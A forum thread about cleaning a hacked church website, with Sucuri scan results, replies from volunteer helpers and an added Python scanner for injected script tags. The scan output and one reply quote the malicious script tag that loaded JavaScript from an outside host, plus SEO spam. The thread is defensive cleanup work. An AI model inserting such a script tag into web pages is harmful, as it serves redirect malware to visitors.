Author Topic: Church website hacked.  (Read 3377 times)


REDACTED

  • Guest
Church website hacked.
« on: May 10, 2015, 07:57:59 PM »
Hi.  I've just inherited a hacked website for our church and am attempting to repair it with little experience!  I do repair computers and have a working knowledge of editing and uploading info to a website, but need some direction.  MacBook Pro 10.9.5, Sandvox 2.1, Transit FTP.
We were using FileZilla when the hack occurred.
The person who built the site and maintained it for several years clicked on a fake Adobe Flash Update link and that started the problems.
I scanned for Malware and Virus with Sophos, Webroot after this happened but we still had intermittent issues on selected computers in the office and from church members at home.
I alerted Cox Communications 5/9/15 and they verified the hack and shut our site down.  They said the hack was using our site to sell counterfeit items and drugs.
Now I'm supposed to clean our website files of the hacks before they can put us back on the web.
I used Sucuri and it yielded the included results.  I am uncertain what steps to take with my limited experience with this type of problem.  Suggestions welcome. (I've used Avast for years on home computers.)

Website: risen-savior.org
Status: Infected With Malware. Immediate Action is Required.
Web Trust: Not Currently Blacklisted (10 Blacklists Checked)

Scan | Result | Severity | Recommendation
Malware | Detected | Critical | Get Your Site Cleaned

Issue Detected | Definition | Infected URL
Website Malware | malware-entry-mwanomalysp8 | http://risen-savior.org
Website Malware | malware-entry-mwanomalysp8 | http://risen-savior.org/about/calendar-google.html
SEO Spam | MW:SPAM:SEO?v011 | http://risen-savior.org

Anomaly behavior detected (possible malware). Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script src="http://meika.ukingfans.com/jdbes.js" type="text/javascript"></script>

Anomaly behavior detected (possible malware). Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script src="http://meika.ukingfans.com/jdbes.js" type="text/javascript"></script>

Known Spam detected. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?v011
<title>Cheap Air Jordan 11 Hoyas For Sale,Retro Low Georgetown Hoyas 11s Full Size</title>

Offline Eddy

  • Avast Evangelist
  • Maybe Bot
  • ***
  • Posts: 31079
  • Watching (over?) you
    • Malware removal, Biljart and other things.
Re: Church website hacked.
« Reply #1 on: May 10, 2015, 08:26:23 PM »
Place a non infected backup back.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33895
  • malware fighter
Re: Church website hacked.
« Reply #2 on: May 11, 2015, 01:47:23 AM »
See fail and warnings: https://asafaweb.com/Scan?Url=risen-savior.org

Take a scan here: https://hackertarget.com/wordpress-security-scan/

Disable or delete all plugins and switch to the default theme
Might be down to the following malicious javascript which appears before the DTD

<script src="htxp://meika.ukingfans.com/jdbes.js" type="text/javascript"></script>
Avast detects as HTML:RedirBA-inf [Trj]

The good news is that you can fix it. :) Read through these articles and you should have your site back. :)

http://codex.wordpress.org/FAQ_My_site_was_hacked
https://wordpress.org/support/topic/exploits-and-godaddy?replies=28#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

polonus (volunteer website security analyst and website error-hunter)
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
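
The check described in the reply above (a script tag injected ahead of the DTD, loading from a host the site never used) can be run over a local copy of the site, including an old backup, before anything is uploaded. This is an added example, not part of the original thread; the host names, the sample pages and the allow-list are constructed assumptions.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# src attribute of every <script> tag, quoted or unquoted
SCRIPT_SRC = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
# Where a legitimate document starts: the DTD, or <html> if there is no DTD
DOC_START = re.compile(r'<!doctype\b|<html\b', re.I)

def scan_html(text, allowed_hosts):
    """Return (reason, src) findings for one HTML document."""
    findings = []
    start = DOC_START.search(text)
    for tag in SCRIPT_SRC.finditer(text):
        src = tag.group(1)
        host = (urlparse(src).hostname or "").lower()
        # Nothing legitimate loads a script before the document begins
        if start and tag.start() < start.start():
            findings.append(("script-before-doctype", src))
        # Relative paths have no host; absolute ones must be on the allow-list
        if host and host not in allowed_hosts:
            findings.append(("unexpected-host", src))
    return findings

def scan_tree(root, allowed_hosts):
    """Scan every .htm/.html file under root; return {relative path: findings}."""
    report = {}
    for path in sorted(Path(root).rglob("*.htm*")):
        if path.is_file():
            hits = scan_html(path.read_text(errors="replace"), allowed_hosts)
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

# Constructed samples: one page with an injected tag, one clean page
INFECTED = ('<script src="http://injected.example.invalid/jd.js" '
            'type="text/javascript"></script>\n<!DOCTYPE html>\n'
            '<html><head><script src="js/site.js"></script></head></html>')
CLEAN = ('<!DOCTYPE html>\n<html><head>\n'
         '<script src="https://www.google.com/calendar/embed.js"></script>\n'
         '<script src="js/site.js"></script>\n</head><body></body></html>')
ALLOWED = {"www.google.com"}  # assumption: hosts the site is known to use

if __name__ == "__main__":
    for name, page in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, scan_html(page, ALLOWED))
```

Running `scan_tree` on the folder that is about to be uploaded lists each affected file, so a backup that was already infected is caught before it goes back online.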

REDACTED

  • Guest
Re: Church website hacked.
« Reply #3 on: May 11, 2015, 06:18:47 AM »
Thank you so much, I'm on it and will report back.

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37527
  • Not a avast user
Re: Church website hacked.
« Reply #4 on: May 11, 2015, 07:59:14 AM »
F-Secure and Norman/BlueCoat have added site to detection

===========================================================================================================
The file you sent was found to be malicious. We will be detecting the sample you submitted as Trojan.JS.Redirector.BRQ in the next database update.
===========================================================================================================
Detections have been added for malicious sample and urls. risen-savior.org.htm  MalScript.N
===========================================================================================================


REDACTED

  • Guest
Re: Church website hacked.
« Reply #5 on: May 12, 2015, 01:19:25 AM »
Well, I had an old copy of the website and gave it to Cox for an upload and they accepted it.  I have to update the content but it meant I didn't get to experiment with your great suggestions.  I'm saving them though, you betcha!  Also looking for another host that keeps back-up copies to prevent this pain in the arse!  Thanks again to all!

Offline Eddy

  • Avast Evangelist
  • Maybe Bot
  • ***
  • Posts: 31079
  • Watching (over?) you
    • Malware removal, Biljart and other things.
Re: Church website hacked.
« Reply #6 on: May 12, 2015, 01:08:25 PM »
Perhaps you'll find something useful in these search results:
http://tinyurl.com/os9h9l2

If the site is using (My)SQL, make sure a backup tool/site is supporting it.